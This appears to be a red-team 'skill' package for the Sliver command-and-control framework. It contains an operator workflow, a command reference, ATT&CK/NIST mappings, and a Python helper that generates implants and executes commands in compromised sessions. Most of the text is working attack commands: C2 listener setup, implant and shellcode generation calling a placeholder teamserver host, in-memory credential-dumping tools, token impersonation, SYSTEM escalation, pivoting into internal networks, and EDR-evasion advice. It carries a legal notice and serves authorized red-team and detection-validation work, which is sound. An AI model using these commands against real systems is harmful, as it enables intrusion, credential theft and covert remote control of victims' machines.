npx skills add mukul975/Anthropic-Cybersecurity-SkillsMITRE ATT&CK
NIST CSF 2.0
Legal Notice: This skill is for authorized security testing, red-team engagements, and educational purposes only. Operating a command-and-control framework against systems you do not own or lack explicit written authorization to test is illegal and may violate computer fraud, wiretap, and abuse statutes. Always work within a signed rules-of-engagement document.
Overview
Sliver is an open-source, cross-platform adversary emulation and command-and-control (C2) framework developed by BishopFox (https://github.com/BishopFox/sliver). It is written in Go and is widely used by red teams as a modern, open alternative to commercial frameworks such as Cobalt Strike. Sliver supports two implant interaction models: sessions (interactive, real-time) and beacons (asynchronous check-in with configurable jitter), and it speaks C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS. Each implant is dynamically compiled with per-binary, asymmetric encryption keys, so no two implants share static signatures.
Sliver also ships an armory — an alias and extension package manager that installs third-party tooling such as Beacon Object Files (BOFs) and .NET assemblies (e.g., sharpdpapi, seatbelt, rubeus) for in-memory execution. Because Sliver has been adopted by real threat actors (documented by Cybereason, Microsoft, and others), exercising it during sanctioned engagements is valuable both for emulating realistic adversary tradecraft and for validating that defensive controls (EDR, network detection, DNS monitoring) catch its C2 channels. This skill covers deploying the server, generating implants, managing listeners, running post-exploitation, and pivoting through compromised hosts.
When to Use
- When conducting an authorized red-team engagement that requires a resilient, multi-protocol C2 channel
- When emulating a specific threat actor's TTPs that include Sliver (per CTI reporting) during a purple-team exercise
- When validating that EDR and network monitoring detect mTLS/HTTPS/DNS beaconing
- When demonstrating post-exploitation and lateral movement impact for a report
Prerequisites
- A dedicated Linux redirector/team-server host (Sliver server runs on Linux/macOS/Windows; Linux is standard)
- Root or sudo for binding privileged ports (443/53) and installing the multiplayer daemon
- Outbound/inbound network reachability matching the chosen C2 protocol
- Familiarity with Active Directory and post-exploitation concepts
- Signed authorization / rules of engagement
Install Sliver server with the official one-liner, or download release binaries:
# Official installer (downloads latest sliver-server + client)
curl https://sliver.sh/install | sudo bash
# Or download specific release binaries from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux
chmod +x sliver-server_linux sliver-client_linuxObjectives
- Launch the Sliver server console and operate in single- or multiplayer mode
- Start mTLS, HTTPS, and DNS C2 listeners
- Generate session and beacon implants for multiple OS/architectures
- Stage implants and host them for delivery
- Interact with callbacks, run post-exploitation, and dump credentials
- Install and run armory extensions (BOFs and .NET assemblies)
- Pivot through a compromised host into segmented networks
MITRE ATT&CK Mapping
| ID | Technique | Use in this skill |
|---|---|---|
| T1071.001 | Application Layer Protocol: Web Protocols | Sliver HTTP(S) C2 listeners blend implant traffic with normal web traffic |
Related techniques exercised by the workflow:
| ID | Technique |
|---|---|
| T1572 | Protocol Tunneling (WireGuard / pivot tunnels) |
| T1090.001 | Internal Proxy (Sliver pivots) |
| T1059 | Command and Scripting Interpreter (implant execute-assembly / shell) |
| T1620 | Reflective Code Loading (in-memory .NET execution) |
Workflow
Step 1: Start the Sliver server console
Run the server interactively to get the operator console:
sudo ./sliver-serverInside the sliver > console, confirm version and view help:
sliver > version
sliver > helpStep 2: (Optional) Configure multiplayer for a team
On the server, generate an operator config and start the multiplayer listener:
sliver > new-operator --name operator1 --lhost teamserver.example.com --save ./operator1.cfg
sliver > multiplayer --lport 31337Distribute operator1.cfg to teammates, who import it with the standalone client:
./sliver-client import ./operator1.cfg
./sliver-clientStep 3: Start C2 listeners
Start one or more listeners. mTLS is the most robust; HTTPS blends with web traffic; DNS is the stealthiest egress for restrictive networks:
# Mutual TLS listener on 443
sliver > mtls --lport 443
# HTTPS listener (serves on 443 by default; supports custom certs)
sliver > https --lport 443
# Plain HTTP (useful behind a TLS-terminating redirector)
sliver > http --lport 80
# DNS listener for a delegated zone you control
sliver > dns --domains c2.example.com. --lport 53
# View running listeners / background jobs
sliver > jobsStep 4: Generate implants
Generate a session implant pointing at your mTLS endpoint:
sliver > generate --mtls teamserver.example.com:443 --os windows --arch amd64 --format exe --save /tmp/Generate a beacon with jitter for asynchronous, lower-noise operation:
sliver > generate beacon --mtls teamserver.example.com:443 --os windows --arch amd64 --seconds 60 --jitter 30 --save /tmp/Other useful formats and channels:
# HTTPS beacon, shellcode format for injection
sliver > generate beacon --http teamserver.example.com --os windows --arch amd64 --format shellcode --save /tmp/
# DNS implant for egress-restricted targets
sliver > generate --dns c2.example.com. --os windows --format exe --save /tmp/
# Linux/macOS ELF/Mach-O implants
sliver > generate --mtls teamserver.example.com:443 --os linux --arch amd64 --format elf --save /tmp/
# List and remove generated implant builds
sliver > implants
sliver > implants rm IMPLANT_NAMEStep 5: Stage implants (optional)
Host a stager for size-constrained delivery. First start a stage listener, then generate a matching stager:
sliver > profiles new --mtls teamserver.example.com:443 --format shellcode --os windows --arch amd64 win-stage
sliver > stage-listener --url tcp://teamserver.example.com:8443 --profile win-stage
sliver > generate stager --lhost teamserver.example.com --lport 8443 --arch amd64 --format cStep 6: Interact with callbacks
When an implant calls back, list and select it:
# Interactive sessions
sliver > sessions
sliver > use SESSION_ID
# Asynchronous beacons
sliver > beacons
sliver > use BEACON_IDInside an interactive session run core post-exploitation commands:
sliver (SESSION) > info
sliver (SESSION) > whoami
sliver (SESSION) > getprivs
sliver (SESSION) > ls
sliver (SESSION) > netstat
sliver (SESSION) > ps -T # show injected/protected processes
sliver (SESSION) > screenshot
sliver (SESSION) > execute -o whoami /allGet a system shell or run a command without spawning a noisy cmd.exe:
sliver (SESSION) > shell # full interactive shell (noisy; use sparingly)
sliver (SESSION) > execute -o ipconfig /allStep 7: Privilege escalation and credential access
# Migrate into another process / impersonate
sliver (SESSION) > migrate PID
sliver (SESSION) > make-token -u DOMAIN\\user -p Password123
sliver (SESSION) > getsystem # attempt SYSTEM via service/named-pipe
# Run .NET tooling in memory (after armory install, see Step 8)
sliver (SESSION) > rubeus triage
sliver (SESSION) > seatbelt -group=systemStep 8: Install and run armory extensions
The armory installs BOFs and .NET assemblies for in-memory use:
sliver > armory # list available packages
sliver > armory install all # or: armory install rubeus / sharpdpapi / etc.
sliver > armory updateOnce installed, the alias/extension is available inside a session as a first-class command:
sliver (SESSION) > sharp-dpapi triage
sliver (SESSION) > sa-whoami # SA = situational awareness BOFs
sliver (SESSION) > inline-execute-assembly /opt/tools/Seatbelt.exe -group=allStep 9: Pivot into segmented networks
Sliver supports named-pipe and TCP pivots plus SOCKS/port-forwarding for tooling:
# Start a SOCKS5 proxy over the implant for proxychains-driven tools
sliver (SESSION) > socks5 start --port 1081
# Local/reverse port forwards
sliver (SESSION) > portfwd add --bind 127.0.0.1:3389 --remote 10.0.5.20:3389
# TCP pivot listener on the beachhead so deeper implants chain through it
sliver (SESSION) > pivots tcp --bind 0.0.0.0:9898
sliver > generate --tcp-pivot 10.0.5.10:9898 --os windows --format exe --save /tmp/
sliver (SESSION) > pivots # list active pivot graphStep 10: Clean up
Remove implants, close sessions, and stop listeners at engagement end:
sliver (SESSION) > kill # terminate the implant cleanly
sliver > jobs -k JOB_ID # stop a specific listener
sliver > implants rm IMPLANT_NAMETools and Resources
| Resource | Purpose | Link |
|---|---|---|
| Sliver (BishopFox) | C2 framework source and releases | https://github.com/BishopFox/sliver |
| Sliver Wiki | Official documentation | https://github.com/BishopFox/sliver/wiki |
| Sliver docs site | Migrated docs | https://sliver.sh/docs |
| Sliver Armory | Extension/alias package index | https://github.com/sliverarmory |
| MITRE ATT&CK T1071.001 | Web Protocols technique | https://attack.mitre.org/techniques/T1071/001/ |
OPSEC and Detection Considerations
| Channel | Blends with | Defender detection opportunity |
|---|---|---|
| mTLS (443) | TLS traffic | JA3/JA3S fingerprinting, self-signed cert anomalies |
| HTTPS | Web browsing | Beaconing periodicity, URI/User-Agent profiling |
| DNS | DNS resolution | High-entropy/long subdomain queries, TXT volume |
| WireGuard | VPN traffic | Unexpected UDP tunnels from workstations |
- Prefer beacons with jitter over interactive sessions to reduce timing regularity.
- Avoid
shell— it spawnscmd.exe/powershell.exechildren that EDR flags; preferexecuteand inline assemblies. - Use redirectors (nginx/Apache) in front of HTTP(S) listeners so the team server IP is never exposed.
Validation Criteria
- Sliver server console launches and
versionreports the installed build - At least one listener (mTLS/HTTPS/DNS) is running and visible in
jobs - A session implant and a beacon implant are generated for the target OS/arch
- An implant calls back and appears in
sessions/beacons - Post-exploitation commands (
info,whoami,screenshot) execute successfully - An armory extension is installed and executed in-memory
- A SOCKS proxy or port-forward is established for pivoting
- Implants killed, listeners stopped, and artifacts removed at cleanup
References and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 2
api-reference.md3.3 KB
Sliver C2 Command Reference
Source: BishopFox Sliver Wiki (https://github.com/BishopFox/sliver/wiki) and console help.
Server / multiplayer
| Command | Description |
|---|---|
sliver-server |
Launch the server console (single-player) |
multiplayer --lport 31337 |
Start the multiplayer gRPC listener |
new-operator --name NAME --lhost HOST --save FILE.cfg |
Generate an operator config file |
sliver-client import FILE.cfg |
Import operator config into the standalone client |
version |
Print server/client version |
jobs / jobs -k ID |
List / kill background listener jobs |
Listeners (C2 jobs)
| Command | Description |
|---|---|
mtls --lport 443 |
Start a Mutual TLS listener |
https --lport 443 |
Start an HTTPS listener |
http --lport 80 |
Start a plain HTTP listener |
dns --domains c2.example.com. --lport 53 |
Start a DNS listener for a delegated zone |
wg --lport 53 |
Start a WireGuard listener |
stage-listener --url tcp://HOST:8443 --profile NAME |
Serve a staged payload |
Implant generation
| Command / flag | Description |
|---|---|
generate --mtls HOST:443 |
Generate a session implant over mTLS |
generate beacon --mtls HOST:443 --seconds 60 --jitter 30 |
Generate a beacon with check-in interval and jitter |
--http HOST / --dns ZONE. / --wg HOST |
Select alternative C2 channels |
| `--os windows | linux |
| `--arch amd64 | 386 |
| `--format exe | shellcode |
--save PATH |
Output directory |
--tcp-pivot HOST:PORT |
Build an implant that connects to a TCP pivot |
generate stager --lhost HOST --lport PORT --arch amd64 --format c |
Generate a stager |
implants / implants rm NAME |
List / delete built implants |
profiles new ... NAME / profiles |
Save/list reusable implant profiles |
Session / beacon interaction
| Command | Description |
|---|---|
sessions / use SESSION_ID |
List / select interactive sessions |
beacons / use BEACON_ID |
List / select beacons |
info |
Implant metadata |
whoami / getprivs |
Identity and privileges |
ps -T |
Process list (with protection flags) |
ls, cd, download, upload, cat, rm |
File operations |
netstat, ifconfig |
Network state |
screenshot |
Capture screen |
execute -o CMD ARGS |
Run a command and capture output |
shell |
Interactive system shell (noisy) |
migrate PID |
Migrate into another process |
make-token -u DOMAIN\\user -p PASS |
Create an alternate logon token |
getsystem |
Attempt SYSTEM escalation |
kill |
Terminate the implant |
Armory (extensions / aliases)
| Command | Description |
|---|---|
armory |
List available packages |
armory install all / armory install NAME |
Install BOFs / .NET aliases |
armory update |
Update installed packages |
inline-execute-assembly PATH ARGS |
Run a .NET assembly in-memory |
Pivoting
| Command | Description |
|---|---|
socks5 start --port 1081 |
Start a SOCKS5 proxy through the implant |
portfwd add --bind 127.0.0.1:LP --remote HOST:RP |
Add a port forward |
pivots tcp --bind 0.0.0.0:9898 |
Start a TCP pivot listener on the beachhead |
pivots |
Show the pivot graph |
standards.md1.4 KB
Standards Mapping: Operating Sliver C2
MITRE ATT&CK
| ID | Name | Rationale |
|---|---|---|
| T1071.001 | Application Layer Protocol: Web Protocols | Sliver's HTTP(S) C2 listeners tunnel implant traffic over web protocols to blend with legitimate browsing and evade egress filtering. |
Related techniques exercised
| ID | Name | Rationale |
|---|---|---|
| T1572 | Protocol Tunneling | WireGuard and pivot tunnels encapsulate C2 inside other protocols. |
| T1090.001 | Proxy: Internal Proxy | TCP/named-pipe pivots and SOCKS proxies route operator traffic through compromised internal hosts. |
| T1059 | Command and Scripting Interpreter | Implant execute/shell runs commands on the target. |
| T1620 | Reflective Code Loading | inline-execute-assembly and BOFs load and run code in-memory without touching disk. |
NIST CSF 2.0
| ID | Name | Rationale |
|---|---|---|
| DE.CM-01 | Networks and network services are monitored to find potentially adverse events | This skill validates that network monitoring detects Sliver's mTLS/HTTPS/DNS C2 channels and beaconing patterns, which is the defensive control DE.CM-01 governs. |
References
- BishopFox Sliver: https://github.com/BishopFox/sliver
- Sliver Wiki: https://github.com/BishopFox/sliver/wiki
- MITRE ATT&CK: https://attack.mitre.org/techniques/T1071/001/
- NIST CSF 2.0: https://www.nist.gov/cyberframework
Scripts 1
agent.py6.3 KB
#!/usr/bin/env python3
"""
Sliver C2 operator automation helper.
Uses the official `sliver-py` gRPC client library (multiplayer / mTLS) to
automate operator interactions with a running Sliver server:
* list active sessions and beacons
* list running C2 listener jobs
* generate an implant build (mTLS/HTTP/DNS)
* run a single command inside an interactive session and print output
Authorized red-team / lab use only.
Install:
pip install sliver-py # for Sliver server v1.5.29+
Requires a Sliver operator config (created with `new-operator ... --save FILE`).
Docs: https://github.com/moloch--/sliver-py
"""
import argparse
import asyncio
import os
import sys
try:
from sliver import SliverClientConfig, SliverClient
from sliver import client_pb2
except ImportError:
sys.stderr.write(
"[!] sliver-py is not installed. Run: pip install sliver-py\n"
)
sys.exit(1)
async def connect(config_path):
"""Parse an operator config and return a connected SliverClient."""
if not os.path.isfile(config_path):
raise FileNotFoundError(f"operator config not found: {config_path}")
config = SliverClientConfig.parse_config_file(config_path)
client = SliverClient(config)
await client.connect()
return client
async def cmd_sessions(client):
sessions = await client.sessions()
if not sessions:
print("[*] No active sessions.")
return
print(f"[*] {len(sessions)} active session(s):")
for s in sessions:
print(f" ID={s.ID} {s.Name} user={s.Username} "
f"host={s.Hostname} os={s.OS}/{s.Arch} remote={s.RemoteAddress}")
async def cmd_beacons(client):
beacons = await client.beacons()
if not beacons:
print("[*] No active beacons.")
return
print(f"[*] {len(beacons)} active beacon(s):")
for b in beacons:
print(f" ID={b.ID} {b.Name} user={b.Username} "
f"host={b.Hostname} interval={b.Interval}s jitter={b.Jitter}")
async def cmd_jobs(client):
jobs = await client.jobs()
if not jobs:
print("[*] No running jobs/listeners.")
return
print(f"[*] {len(jobs)} job(s):")
for j in jobs:
print(f" ID={j.ID} {j.Name} protocol={j.Protocol} port={j.Port}")
async def cmd_generate(client, host, proto, os_target, arch, fmt, save_dir):
"""Generate an implant build via the server."""
c2 = client_pb2.ImplantC2(Priority=0, URL=f"{proto}://{host}")
fmt_map = {
"exe": client_pb2.OutputFormat.EXECUTABLE,
"shellcode": client_pb2.OutputFormat.SHELLCODE,
"shared": client_pb2.OutputFormat.SHARED_LIB,
"service": client_pb2.OutputFormat.SERVICE,
}
config = client_pb2.ImplantConfig(
GOOS=os_target,
GOARCH=arch,
Format=fmt_map.get(fmt, client_pb2.OutputFormat.EXECUTABLE),
IsBeacon=False,
C2=[c2],
)
print(f"[*] Requesting implant build ({os_target}/{arch}, {fmt}, {proto})...")
implant = await client.generate_implant(config)
out_path = os.path.join(save_dir, implant.File.Name)
with open(out_path, "wb") as fh:
fh.write(implant.File.Data)
print(f"[+] Implant written: {out_path} ({len(implant.File.Data)} bytes)")
async def cmd_exec(client, session_id, command):
"""Run a single command inside an interactive session."""
interact = await client.interact_session(session_id)
if interact is None:
print(f"[!] No session with ID {session_id}")
return
parts = command.split()
exe, args = parts[0], parts[1:]
print(f"[*] execute {command} on session {session_id}")
result = await interact.execute(exe, args, True)
if result.Stdout:
sys.stdout.write(result.Stdout.decode(errors="replace"))
if result.Stderr:
sys.stderr.write(result.Stderr.decode(errors="replace"))
print(f"\n[+] exit status: {result.Status}")
def build_parser():
p = argparse.ArgumentParser(
description="Sliver C2 operator automation helper (sliver-py)."
)
default_cfg = os.path.join(
os.path.expanduser("~"), ".sliver-client", "configs", "default.cfg"
)
p.add_argument("-c", "--config", default=default_cfg,
help="path to operator .cfg (default: %(default)s)")
sub = p.add_subparsers(dest="action", required=True)
sub.add_parser("sessions", help="list active sessions")
sub.add_parser("beacons", help="list active beacons")
sub.add_parser("jobs", help="list running listener jobs")
g = sub.add_parser("generate", help="generate an implant build")
g.add_argument("--host", required=True, help="C2 host[:port]")
g.add_argument("--proto", default="mtls",
choices=["mtls", "http", "https", "dns"])
g.add_argument("--os", dest="os_target", default="windows",
choices=["windows", "linux", "darwin"])
g.add_argument("--arch", default="amd64",
choices=["amd64", "386", "arm64"])
g.add_argument("--format", dest="fmt", default="exe",
choices=["exe", "shellcode", "shared", "service"])
g.add_argument("--save", default=".", help="output directory")
e = sub.add_parser("exec", help="run a command in a session")
e.add_argument("--session", required=True, help="session ID")
e.add_argument("--command", required=True, help="command line to run")
return p
async def run(args):
client = await connect(args.config)
try:
if args.action == "sessions":
await cmd_sessions(client)
elif args.action == "beacons":
await cmd_beacons(client)
elif args.action == "jobs":
await cmd_jobs(client)
elif args.action == "generate":
await cmd_generate(client, args.host, args.proto, args.os_target,
args.arch, args.fmt, args.save)
elif args.action == "exec":
await cmd_exec(client, args.session, args.command)
finally:
# SliverClient uses a long-lived gRPC channel; nothing to close explicitly.
pass
def main():
args = build_parser().parse_args()
try:
asyncio.run(run(args))
except FileNotFoundError as exc:
sys.stderr.write(f"[!] {exc}\n")
sys.exit(2)
except Exception as exc: # noqa: BLE001 - surface gRPC/connection errors clearly
sys.stderr.write(f"[!] error: {exc}\n")
sys.exit(1)
if __name__ == "__main__":
main()